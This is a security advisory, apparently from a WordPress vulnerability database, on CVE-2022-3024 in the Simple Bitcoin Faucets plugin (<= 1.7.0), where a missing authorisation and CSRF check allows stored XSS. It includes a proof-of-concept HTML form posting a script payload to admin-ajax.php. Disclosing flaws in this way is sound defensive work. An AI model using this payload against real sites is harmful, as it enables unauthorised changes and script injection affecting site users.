WordPress Plugin Vulnerabilities

Simple Bitcoin Faucets <= 1.7.0 - Unauthorised AJAX Call to Stored XSS

Description

The plugin does not have any authorisation and CSRF in an AJAX action, allowing any authenticated users, such as subscribers to call it and add/delete/edit Bonds. Furthermore, due to the lack of sanitisation and escaping, it could also lead to Stored Cross-Site Scripting issues

Proof of Concept

Open a page containing the HTML code below as any authenticated user, or make any authenticated user open it via a CSRF attack

<form action="https://example.com/wordpress/wp-admin/admin-ajax.php" method="POST">
    <input type="text" name="action" value="SBF_DB_code_manage_action">
    <input type="text" name="B_COMMAND" value="ADD">
    <input type="text" name="B_PARAM" value="10">
    <input type="text" name="B_PARAM2" value="<script>alert(/XSS/)</script>">
    <input type="text" name="B_PARAM3" value="1">
    <input type="submit" name="submit" value="submit">
</form>

Affects Plugins

Plugin icon
simple-bitcoin-faucets
No known fix

References

CVE
CVE-2022-3024

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.4 (medium)

Miscellaneous

Original Researcher
Lana Codes
Submitter
Lana Codes
Submitter website
https://lana.codes/
Submitter twitter
LanaCodes
Verified
Yes
WPVDB ID
7f43cb8e-0c1b-4528-8c5c-b81ab42778dc

Timeline

Publicly Published
2022-08-31 (about 1 years ago)
Added
2022-08-31 (about 1 years ago)
Last Updated
2022-08-31 (about 1 years ago)

Other

Published
Title
Published
2022-05-02
Title
Google XML Sitemap Generator < 2.0.4 - Reflected Cross-Site Scripting
Published
2024-04-16
Title
WP 404 Auto Redirect to Similar Post < 1.0.5 - Reflected Cross-Site Scripting via Debug Mode URI
Published
2023-11-03
Title
Apollo13 Framework Extensions < 1.9.1 - Contributor+ Stored XSS
Published
2022-12-27
Title
Sitemap < 4.4 - Contributor+ Stored XSS
Published
2024-03-07
Title
EmbedPress – Embed PDF, Google Docs, Vimeo, Wistia, Embed YouTube Videos, Audios, Maps & Embed Any Documents in Gutenberg & Elementor < 3.9.11 - Authenticated (Contributor+) Stored Cross-Site Scripting via EmbedPress PDF Widget